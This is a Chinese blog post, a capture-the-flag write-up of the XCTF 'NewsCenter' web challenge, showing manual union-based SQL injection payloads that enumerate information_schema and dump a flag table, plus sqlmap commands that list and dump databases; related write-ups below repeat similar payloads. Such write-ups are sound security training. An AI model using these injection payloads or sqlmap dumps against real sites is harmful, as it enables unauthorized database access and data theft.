2020.3.29 xctf(NewsCenter)①

最新推荐文章于 2023-12-27 19:17:06 发布
最新推荐文章于 2023-12-27 19:17:06 发布
阅读量421 收藏
点赞数
分类专栏: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/DSR446/article/details/105189612
版权

打开题目,有一处搜索框,搜索新闻。考虑xss或sql注入
这里我们介绍两种手动和sqlmap

①手动测:
在这里插入图片描述我们这里先用order by 手动测字段数,发现当4的时候页面就不能正常显示了,所以这里应该是3。

查询当前数据库中的所有表名:

1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#

在这里插入图片描述
这里的news指的是当前数据库名,后面是表名

查询表中的列名:

1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='secret_table'#

在这里插入图片描述

得到flag:

1' union select 1,2,fl4g from news.secret_table#

在这里插入图片描述

②sqlmap
先bp抓包,并将当前数据包中的内容放到sqlmap文件的下面(新建一个文件)。
爆出当前所有数据库名

sqlmap -r xctfrequest.txt --dbs

在这里插入图片描述sqlmap -r xctfrequest.txt -D news --tables sqlmap -r xctfrequest.txt -D news -T secret_table --columns sqlmap -r xctfrequest.txt -D news -T secret_table -C "id,fl4g" --dump

当然你也可以一次性把new数据库内的内容全部爆出来,这样就不用一步步找flag在哪了,直接了当,所以对于有目的,好寻找的我们可以使用第一种步步深入;如果比较难找,就第二种方法比较好

sqlmap -r xctfrequest.txt -D news --dump
藏蓝色的达达
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XCTF:NewsCenter
m0_64898960的博客
03-18 4100
xctf 因为有输入框,我习惯初步判断它为sql注入 1.测试是否存在注入点,输入 1' 结果报错了,然后尝试 1" 2.知道存在注入,且为字符型注入。然后进行字段数猜测 直到字段数为4开始报错 3.尝试获得显示位 4.查库名 5.查表名 6.查列名 7.获取flag 到这里本题就已经解出来了,下面是我在上面用到的sql语句。 1' 1" 1'order by 1# -1'union select 1,2,3# -1'uni...
XCTF攻防世界web.doc
09-19
XCTF攻防世界Web WriteUp】 在网络安全竞赛中,CTF(Capture The Flag)是一种常见的形式,其中“XCTF攻防世界”是一个专注于Web安全的平台,旨在帮助参与者提升网络安全技能,特别是Web应用的安全防御和攻击能力...
XCTF_NewsCenter
TA不懒,但还没有添加简介
01-17 2972
XCTF_NewsCenter
XCTF-NewsCenter(SQL注入解析)
weixin_44823018的博客
01-10 1089
这是一道关于SQL注入的题目
xctf-web-NewsCenter
Spwpun的博客
03-30 2251
一个无报错回显的注入漏洞,明明一个很简单的sql注入题,我却花一个小时来做,服了自己了,依赖于sqlmap我从来没尝到甜头过,还是得对information_schema表结构有一定的理解: 查询当前数据库中的所有表名: 1’ union select 1,2,group_concat(table_name) from information_schema.tables where table_...
XCTFNewsCenter
Keepb1ue的博客
01-12 1633
一道简单的常规注入题
xctf.rar_HTML5自适应
09-19
这个"xctf.rar"压缩包包含了一个实现HTML5全屏滚动效果的源码,它能实现平滑滚动,并且能够自适应不同浏览器的显示。 全屏滚动,也称为全屏滑动或全景观览,是一种让网页内容以连续的全屏视图展示的设计方式。这种...
xctf_huaweicloud-qualifier-2020
05-31
xctf_huaweicloud-qualifier-2020写上去译文原始码类别名称网址分数解决了PWN cp 游戏 快速执行 Fastga mysqli 迷你人 nday_container_escape qemu-zzz 网络隐藏云我的1 我的2 派尔 网壳 :cross_mark: 杂项以太网 谁...
XCTF-RE】新手练习区-re1.exe
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/ugg9gy
XCTF-Mobile】新手练习区-08-app3.rar
08-30
题目:https://adworld.xctf.org.cn/task/answer?type=mobile&number=6&grade=0&id=5087&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/app3
NewsCenter
06-23
自己做的系统,运行没什么问题,页面不是很多,主要有有添加新闻、删除新闻、查看新闻、修改新闻等操作。是三层架构。
攻防世界XCTFNewsCenter
末初的CSDN博客
03-06 403
这道题是一个非常简单的sql注入 ’ and 1=1#回显正常,’ and 1=2#回显不正常。即可判断存在sql注入。 接着查看,这张表有几个字段,'order by 3#正常,'order by 4#报错,判断存在3个字段。 联合查询,发现2,3这两个字段存在回显。 查询版本和当前连接的数据库 查询当前用户和所有数据库 查表名 查字段 获取字段内容 ...
XCTF-高手进阶区:NewsCenter
1stPeak's Blog
06-13 3195
XCTF-高手进阶区:NewsCenter
XCTFNewsCenter[WriteUP]
最新发布
如有错误感谢斧正
12-27 517
记住这里的id="sample3",待会sqlmap需要使用到。在该页面按F12查看元素,搜索search这个搜索框。里面有一个假的flag,一开始在这里卡了下...最后,值得一提的是。在另一个名叫cyber的库。使用--dump命令展示column中的数据。先查看secret_table里的东西。使用命令直接查看该搜索框所在的库名。再次使用命令,查看该库下的表单。很显然直接就可以拿到flag了。如图所示:DBS:news。目的是查看该搜索框的id。
XCTF NewsCenter wp
weixin_45253216的博客
01-08 344
2021.1.8 网安菜鸡今天来划水了! 很久以前的一道题,因为打开环境一直出错,所以一直拖到现在。CTF题目属于萌新入门级,写下WP仅供自己总结练习,大佬请自行绕路,另外如果有师傅愿意有每日轻松一笑环结,还望不吝赐教。【狗头】 打开环境,是一个搜索页面,有一个Search News的搜索框,盲猜sql注入。 在搜索框输入搜索内容,url不变,所以应该是post注入。话不多说,sqlmap安排! First:sqlmap进行POST注入的两种方式 可能有3,4,5种,能力有限,先学两个 方法一:自动搜索表
XCTF web NewsCenter(sqlmap简单使用)
H4ppyD0g的博客
09-12 750
打开网页是一个查询操作的输入框,判断应该存在sql注入。 随便输入一些东西后回车,用bp抓包,抓取的内容放到一个1.txt文件里面 之后用到sqlmap sqlmap.py -r 1.txt --dbs 用1.txt内容去搜索对应的所有数据库名 可以爆出两个库 sqlmap.py -r 1.txt -D news --dump 建立可后台news库连接, 搜索所有的数据 sql部分常用参数 ...
2020.4.9 xctf(Cat)
DSR446的博客
04-19 307
给url参数传入参数%80,Django报错,根据报错知道网站是Django开发  结合PHP可以通过在参数中注入@来读取文件的漏洞,首先看看配置文件settings.py,看看有没有相关的有用的信息。 Payload:?url=@/opt/api/api/settings.py 得到数据库名为 database.sqlite3 再获取数据库内容 Payload:?url=@/opt/api/...
2020.4.8 xctf(fakebook)
DSR446的博客
04-10 655
提示让我们注册一个账号,这里随便注册,注意一下blog的格式就行。 然后用我们注册好的账号进行登录。 登录后发现url 为 http://111.198.29.45:33988/view.php?no=1 ,第一时间想到是否存在sql注入,我们输入 ’ 根据报错的显示,可以肯定存在sql注入的,然后我们用 order by 语句判断查询的字段数目,以便于后续进行 union 查询, 先 ...
XCTF攻防世界-NewsCenter-SQL简单注入-sqlmap注入
MJosek博客
03-23 1204
题目地址:https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=1&id=4686&page=1 我们进入页面 观察界面我们考虑到是sql注入 这里我们演示的是sqlmap的注入方法 首先我们页面的post请求进行抓包操作 ...
xctf supersqli
09-01
对于 xctf supersqli,它是一个供参与者练习 SQL 注入技巧的 CTF(Capture The Flag)比赛题目。CTF比赛是一种网络安全竞赛,旨在测试参与者在各种安全领域的技能。在 xctf supersqli 中,参与者需要利用 SQL 注入...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值